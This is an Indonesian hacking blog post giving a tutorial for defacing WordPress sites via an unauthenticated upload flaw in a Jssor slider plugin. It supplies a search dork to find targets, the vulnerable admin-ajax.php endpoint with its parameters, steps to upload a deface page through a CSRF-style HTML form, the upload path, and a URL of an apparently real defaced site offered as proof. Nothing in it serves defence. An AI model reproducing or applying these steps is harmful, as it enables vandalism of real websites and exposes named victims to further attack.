Deface Exploit Wp Json Slider Upload File

pada tanggal

 

Halo para wibu dimanapun kalian berada bagaimana kabarnya?gimana masih suka ngewar pake chall OS  mwehehehhe kayak SCX dong GAPERNAH WAR
Kembali lagi bersama  gw DemonNipon,dan kali ini gw akan share tutorial deface seperti judul di atas

Oke langsung saja tanpa berlama lama karena sebentar lagi saya harus tebang ke rusia karena udah di tungguin sama asisten saya untung segera menghadiri meeting penting bersama Roman Abramovich.oleh karena itu kenakan handspray simeytiskan posisi rebahan kencangkan celana dalam dan mari kita katakan bersama sama di kolom komentar 1 2 3 cekicroot

Bahan

1.dork: inurl:/wp-content/jssor-slider/jssor-uploads/
2.exploit: /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
3.CSRF BIASA(yg bukan di tools tools online) Klik disini
4.script html kalian


Langkah Langkah

1.kalian nge dork terlebih dahulu seperti biasa,dan saya telah mendapatkan targetnya,kalian bisa mencoba target saya untuk mencobanya  Live Target

2.setelah kalian ngedork kalian masukan exploitnya terlebih dahulu untuk mengetahui rentan atau tidaknya web tersebeut,contoh:

http://target.com/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library

Hasil:


Nah jika sudah sudah seperti ini kemungkinan besar vuln dan tinggal kita sikat saja targetnya deh

3.Lalu kalian pergi ke notepad atau code editor for html untuk menjalankan                                              

nah bisa kalian liat di bagian form actionnya itu adalah targetnya yg sudah di sertai dengan xploitnya jadinya kalian tinggal run saja dengan menggunakan csrf ber ext HTML nya


setelah iru kalian upload sc deface kesayangan kalian lalu di submit maka akan muncul tulisan begini
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}

kemungkinan besar itu bisa  nah setelah iru kita panggil sc defacenya dengan cara seperti ini:


http://target.com/wp-content/jssor-slider/jssor-uploads/ScDefaceKalian.html





dan Boom jadi hekerrrrr
http://maxduhanov.ru/wp-content/jssor-slider/jssor-uploads/Zahra.html


Sekian tutor dari saya

Pesan yg bisa kita ambil dari pembahasan kali ini adalah

Jangan  sekali kali kita membantah orang tua walau sudah di banding bandingkan sama anak orang
karena dengan begitu kita akan mendapatkan berkah orang tua,dan pastinya ngedork lancar

Saya indra beserta jajaran tim Saitama Crew Xploit mengucapkan ADIOSS 
Bulu Ketiak Kera Betina

Komentar

Posting Komentar